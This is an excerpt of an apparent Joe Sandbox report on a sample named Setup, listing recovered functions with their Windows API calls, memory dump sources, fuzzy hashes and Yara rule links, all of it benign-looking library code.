Part of subcall function 008481D0: LoadLibraryW.KERNEL32(ComCtl32.dll,275F26E1,00000000,00000000,?), ref: 0084820A
Part of subcall function 008481D0: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00848230
Part of subcall function 008481D0: FreeLibrary.KERNEL32(00000000), ref: 008482B9

SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00848ABE
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00848ACD

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: LibraryMessageSend$AddressFreeLoadProc
String ID:
API String ID: 3032493519-0
Opcode ID: da207fc8035593e92dba16958d94b57f1d689ca7d4ec776accfcb0dd988d68db
Instruction ID: 63722ef8022ad8f7f00e77564963c1855e1b3cdbde494ec69a768ac0d8db0339
Opcode Fuzzy Hash: da207fc8035593e92dba16958d94b57f1d689ca7d4ec776accfcb0dd988d68db
Instruction Fuzzy Hash: 7BF0A03278021433F22421696C0BFAB758DD780B21F104225FA88EB2C2ECD26C0102E9

Function 0092A5C0 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,009336D6,?,00000000,?,?,00933977,?,00000007,?,?,00933DD2,?,?), ref: 0092A5D6
GetLastError.KERNEL32(?,?,009336D6,?,00000000,?,?,00933977,?,00000007,?,?,00933DD2,?,?), ref: 0092A5E1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 2583f42559121fd28b09b3af3516a59058735cda0f3fa07b506fd2c4c1540e42
Instruction ID: b7b544db4835a837dd486bf97b7203837e458b0d1fc50206d8188617807a9ece
Opcode Fuzzy Hash: 2583f42559121fd28b09b3af3516a59058735cda0f3fa07b506fd2c4c1540e42
Instruction Fuzzy Hash: 67E08C32618228ABCB212BE0BC09B9E7A6CAF42752F140065F60CD60B0DA3889909BD1

Function 0090DEA1 Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,?,0090DFFC,00A66574,?,?,?,?,?,?,?,?,0090DCF7,00000000,00000000,00000004), ref: 0090DF33

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7bf94bfe491b3679a9239ed29eeacb61df6a1ba693a66e718cbf613585002698
Instruction ID: e8066b3dca1a6df003a3470f5e95a879640f2784fadd67f27c0c92af4a98bb76
Opcode Fuzzy Hash: 7bf94bfe491b3679a9239ed29eeacb61df6a1ba693a66e718cbf613585002698
Instruction Fuzzy Hash: 7011D0B242220ABEDB219EC0ED41BAB7B7C9F8A714F244056FB026B1C0C6B09D429660

Function 0092A610 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0092C6C5,?,00000000,?,0091BDB9,?,00000004,?,?,?,?,00927FDC), ref: 0092A645

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 32abe3c4454e1cc936b8fbd378d2ba442ee373e0b4be9f808cddb79ad9502e37
Instruction ID: 0a2a85fef63f8069847b10d37cc048370028d10d9f44dbd0c2c947b06f3c69a6
Opcode Fuzzy Hash: 32abe3c4454e1cc936b8fbd378d2ba442ee373e0b4be9f808cddb79ad9502e37
Instruction Fuzzy Hash: 5CF0E53361563A67DB2036B5BC09B57778C9F827A0F0D0522F805D20C8DB10CC41A6E6

Function 00928152 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00928159

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: a7016b0c0dc2690340b3711e7903e5112b164572a4e6daa013e27a20d929c0ab
Instruction ID: 56ed634fb20687e4b513d2d1e3575c6e457983b6e2496eece778c84aea454391
Opcode Fuzzy Hash: a7016b0c0dc2690340b3711e7903e5112b164572a4e6daa013e27a20d929c0ab
Instruction Fuzzy Hash: 22E01AB2D1020EAACF00DFE4C442BEFB7BCAB44300F504066A201E6140EB345785CBA1

Function 0090D0AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D07C

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 05e0a80ee3c6a9241a30014254ce9ec8672d2851993843730eb37ca47b08cdc5
Instruction ID: 8fdabbed8209ad096905ec61224f9a794ddb439dd4cbd70fe86d31814c926495
Opcode Fuzzy Hash: 05e0a80ee3c6a9241a30014254ce9ec8672d2851993843730eb37ca47b08cdc5
Instruction Fuzzy Hash: ABB012D13AE001FD720892882D02E37015CD1C8B21730C91AF509C40C0D5804D460031

Function 0090D191 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 787e47d2a534bb36483655d19576ddf20ebec121ebcdaefbdaa2fc37cf5af20f
Instruction ID: 39b4ca46658167fd3b835de4391603f7b84265665c27b096fc58802d106b010a
Opcode Fuzzy Hash: 787e47d2a534bb36483655d19576ddf20ebec121ebcdaefbdaa2fc37cf5af20f
Instruction Fuzzy Hash: 86B012A13EF001FD714C92881C02D37016CE0C4F21330C81BF806C10C0E8A00D041131

Function 0090D19B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 27f8de93fdcf72a66029b6e66d86875a919bc9d3e5882a7b6b9f9292b90873b7
Instruction ID: f53f6268810aac2f262c2753e1e2e2e5864c7fad07ed7f78c833dc5b2df9918f
Opcode Fuzzy Hash: 27f8de93fdcf72a66029b6e66d86875a919bc9d3e5882a7b6b9f9292b90873b7
Instruction Fuzzy Hash: CBB012B13EF001FD714C92881D02D37016CD0C4F21330C81BF806C10C0D8A00D051031

Function 0090D187 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2bf539cf194eff9546a010b11c814c16eddeb338c945db08b64d23ae48e4aa88
Instruction ID: 2e970d011fdd66d90f22fa7b2a39014493bea6cf1a02e7060846d7780d703608
Opcode Fuzzy Hash: 2bf539cf194eff9546a010b11c814c16eddeb338c945db08b64d23ae48e4aa88
Instruction Fuzzy Hash: B5B012952BF001FD714C92882C02D37016CD0C4F21330C81BF807C20C0D8900C041031

Function 0090D1AF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 79f8c49b16684d8f8c1044b21d3b0e4319df916f206aed5fe58b223221b1e434
Instruction ID: 1dba8496ce6598a3031365cff495bd6cac73577def5df9a85c1f88610b0ecb73
Opcode Fuzzy Hash: 79f8c49b16684d8f8c1044b21d3b0e4319df916f206aed5fe58b223221b1e434
Instruction Fuzzy Hash: 28B012A53FF001FD724C92881C02D37016CD0C4F21330C81BFC06C10C0D8A00D041031

Function 0090D1D7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 6b4af3a048adc330f73057d409844243d9c0d95a3e1a93ed2f83adb1a80fe8b9
Instruction ID: e83b6fc00974450330abfa22701417ac8fb51469d2759e587c4cc19c851d2f2e
Opcode Fuzzy Hash: 6b4af3a048adc330f73057d409844243d9c0d95a3e1a93ed2f83adb1a80fe8b9
Instruction Fuzzy Hash: 29B012952BF001FD714C928C1C02D37016DD0C4F21330C82BF806C10C0D8900C081031

Function 0090D1C3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 64618dc9a9f0cc2611ae7c351359275934e819a146f34e415403a9f085089be8
Instruction ID: 140cdd280ef1b9da4e4432be238ee453a2c8de0500286e0c13c9c9f84bcf7f46
Opcode Fuzzy Hash: 64618dc9a9f0cc2611ae7c351359275934e819a146f34e415403a9f085089be8
Instruction Fuzzy Hash: A1B012A12AF001FD714C928C1D02D37016DD0C4F21330C82BF406C10C0E8910C0D1031

Function 009111FD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009111CC

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f7a9a2f693aad5919e021c9012d9b9a60766e64ff7883e4cc9c4980cc2786345
Instruction ID: ca48276e185abf2d9cf168fc9cdbfcfe6f2b30f293853d6ecfac3f68d0befa8c
Opcode Fuzzy Hash: f7a9a2f693aad5919e021c9012d9b9a60766e64ff7883e4cc9c4980cc2786345
Instruction Fuzzy Hash: 1FB012953BD001BD310892C82C02F77018CE0DAB12730CA1FFB05C40C0D4500D484031

Function 0090D1E1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: a2694ce8d0df90d1dbed01a1a0542b4fabd4a54d64ac0494da930c531a7f6400
Instruction ID: 09b694ce8139414987f07381dc23f5cfd7314489384f71929bc94768c3d13280
Opcode Fuzzy Hash: a2694ce8d0df90d1dbed01a1a0542b4fabd4a54d64ac0494da930c531a7f6400
Instruction Fuzzy Hash: E7B012912AF105FD714CD2881C42D3B016CE0C4F21330C81BF406C10C0E8900C041231

Function 0090D1EB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D16A

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 948b3bf7bb6834c4f832a0623f8e02e34d2c8959fffd76874cfcc76d72ae4cf3
Instruction ID: d79986051c2157b2c0570d339280c6c5d02291627514ea93236b075acffa27ca
Opcode Fuzzy Hash: 948b3bf7bb6834c4f832a0623f8e02e34d2c8959fffd76874cfcc76d72ae4cf3
Instruction Fuzzy Hash: 6DB012912AF301FD764CD2881C43D3B016CD0C4F21330C91BF406C10C0D8900C445031

Function 00911207 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009111CC

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: c423de2f74d71ee64de36eb7bdcee3660afc385c04e4e15b61489cc0d26115a3
Instruction ID: 10a0b547db07a152b62657e19d61b1f186b5dbbd35d8562ff0d4d0104a25f15d
Opcode Fuzzy Hash: c423de2f74d71ee64de36eb7bdcee3660afc385c04e4e15b61489cc0d26115a3
Instruction Fuzzy Hash: 1AB012953BD001FD310892492C02F77018CE0C9B11730CE1EFF45C40C0D8500C444131

Function 0090D3FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D3F3

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 1090dd82802eac6be7f293598fd0a03e2d823ff9764d11481b0d02dd082bbeb2
Instruction ID: c7c6b81d321fc2276daa2a24e9664c3069294c2b30e50c6c0f4ea648ee972638
Opcode Fuzzy Hash: 1090dd82802eac6be7f293598fd0a03e2d823ff9764d11481b0d02dd082bbeb2
Instruction Fuzzy Hash: 27B012813EE101FD720892882C43D37424CE0CCB22330CA2AF405C00C1D9800C444072

